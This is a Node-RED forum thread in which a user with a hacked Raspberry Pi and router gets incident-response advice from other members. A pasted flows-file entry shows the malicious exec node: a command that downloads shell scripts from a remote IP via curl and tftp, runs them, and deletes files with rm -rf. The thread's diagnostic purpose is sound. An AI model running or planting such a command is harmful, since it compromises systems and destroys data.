Pull the WAN from it now, and start checking your systems over.
Can the router be flashed with custom Firmware do you know?
Whilst unlikely, but still possible, it could have been flashed with a compromised firmware build, to aid in the activity, so even if you reset it, the firmware may still be compromised, and allowing a 'back door'
It is certainly possible. What router make is it?
Also, do you have anything else running on that network?
You will need to change the router and wi-fi passwords but as Marcus says, ideally you would push a known good firmware onto the router if that is an option before doing anything else.
Its the most recent vodafone router. Would a factory reset suffice?
Also can anyone tell me why I have all that bash not found stuff in the terminal window. This is from a known good backup imaged sd card.
thanks
Probably. Do the reset offline and change the passwords before connecting to the Internet. Leave other devices off your network until you are happy with the router.
I'll do that. Any ideas on the "bash not found" stuff.
I can't see any obvious issues with Vodafone routers in particular. One had a very weak default password but you are changing that anyway. Of course, choose a strong passcode for your router and wi-fi passcodes and don't forget to save them in a password manager so you don't lose them.
For a double-check, use GRC | ShieldsUP! ā Internet Vulnerability Profiling to check that you don't have any open ports.
Looks like firmware updates for Vodafone routers are available via the admin interface: firmware.pdf (vodafone.ie)
I never do full-system backups because by the time you ever need to restore, the world has moved on a long way and things change.
So my recommendation is to start from scratch. Download a fresh copy of the latest Rasbian. Then install your dependencies: Node.js - via nodesource/distributions: NodeSource Node.js Binary Distributions (github.com) preferably though you could use Dave's script if you prefer. Mosquitto. And anything else you need.
Take notes as you go along so that should you ever need to start again, you've left yourself some clues.
Finally, copy what specific things like your userDir folder from your backup and maybe your Mosquitto config if you can't remember how you set it.
Anyway, that's how I do it.
Talk to Vodafone support, tell them you were hacked and your router password changed back to the default. Ask them if a factory reset is safe.
When you start a terminal window the commands in .bashrc and /etc/rc.local (I think) are run.
If you open a terminal and run source ./.bashrc, do you see the same errors again?
and ?source /etc/rc.local
If so, can you post the contents of .bashrc?
note:
/etc/rc.local is run when the system boots up, not when you open a terminal. Worth checking if it has been modified though.
6 solid hours now today. I did a factory reset and now it wont connect to internet saying "no ip4 address"
Vodafone support guy asked me 4 times about lights on unit and each time I told him that there were none. Anyway still no internet. Definitely been hacked! There is this horrible feeling like being burgled, as in what else have they taken.
It is a lot more than that. Best to look it up, I can never remember the full list but the profile is also run I think. And I can't remember if both the /etc version and the ~/ versions are run.
I plan to do a completely fresh install. There is a lot of stuff. Is it foolish to open a port for PIVPN?
That way I could get access to dashboard etc.
Personally I don't like full VPN connections due to the risks of a remote device being compromised and getting access to your network. The risk level depends on where you travel to though I suppose.
My preferred approach is to use Cloudflare Zero Trust which has an excellent free-tier. Using that, you can have login secured access to your Node-RED install without needing any holes in the firewall. You can also get a browser SSH terminal, again without having to expose your SSH via your router.
Can this be installed on a mobile phone. I use dashboard web page to control lots of stuff on a remote site.
It is a web service so you access everything from your browser.
I have a couple of things set up:
Because it is clouldflare, you get their excellent security so you can restrict to certain countries, certain types of login and more. Login's can be specific user id's or can be linked to external logins such as GitHub, LinkedIn, etc. (OAuth).
So yes, all accessible from a mobile.
The only possible downside is that you need a domain name and you need to let Cloudflare manage it. They also offer cheaper domain name registration by the way as they do not add overheads to the basic cost so grabbing a .uk, .com or whatever is as cheap as it can be and you get an excellent DNS management portal too and DNS security. You can leave your existing domains with your current registrar if you want to and just let Cloudflare manage it but they are so good, I've moved all of mine.
Great, I'll investigate.
thanks again everyone.
I found this in my flows file:
"id": "04e9bf59d127ed59",
"type": "exec",
"z": "86baa6d42e952f84",
"command": "cd /tmp && curl -O http://79.110.62.138/eskgbins.sh && chmod 777 eskgbins.sh && sh eskgbins.sh && tftp 79.110.62.138 -c get eskgtftp1.sh && chmod 777 eskgtftp1.sh && sh eskgtftp1.sh && tftp -r eskgtftp2.sh -g 79.110.62.138 && chmod 777 eskgtftp2.sh && sh eskgtftp2.sh && rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh && rm -rf *",
"addpay": "payload",
"append": "",
"useSpawn": "false",
"timer": "10080",
"winHide": false,
"oldrc": false,
"name": "",
"x": 600,
"y": 600,
"wires": [
,
,
]
PS
actually several more curl instances. I can upload if they mean anything to anyone
Yup!
You have been had, by the same reported here, this suggests you had an unauthenticated Node RED instance being made public?
Was that flow present on the old backup SD card or did the pi get reinfected?
Have Vodafone given you any reassurance about the router?
Have you got other Linux computers on your network?
That curl item plus about 6 others were on the infected PI. The backup sd card seems clean.
Vodafone folk said they had never heard of their routers being hacked.
This all happened at our holiday cottage where use PI to control heating, monitor oil etc. When we arrived and before discovering the hack I connected to our home via vpn to do some stuff. At home I have 2 PIs and a 24/7 PC. I don't know how viruses work but......
Anything connected to the Internet is fair game to hackers and bots. It takes less than 30seconds for a newly connected IP address to start being scanned.
And you've found the problem with VPN's. They create an extension from one network to another so compromises in one potentially extend to the other.
This is why I generally don't recommend them unless you know what you are doing.
Copyright OpenJS Foundation and Node-RED contributors. All rights reserved. The OpenJS Foundation has registered trademarks and uses trademarks. For a list of trademarks of the OpenJS Foundation, please see our Trademark Policy and Trademark List. Trademarks and logos not indicated on the list of OpenJS Foundation trademarks are trademarksā¢ or registeredĀ® trademarks of their respective holders. Use of them does not imply any affiliation with or endorsement by them.
The OpenJS Foundation | Terms of Use | Privacy Policy | OpenJS Foundation Bylaws | Trademark Policy | Trademark List | Cookie Policy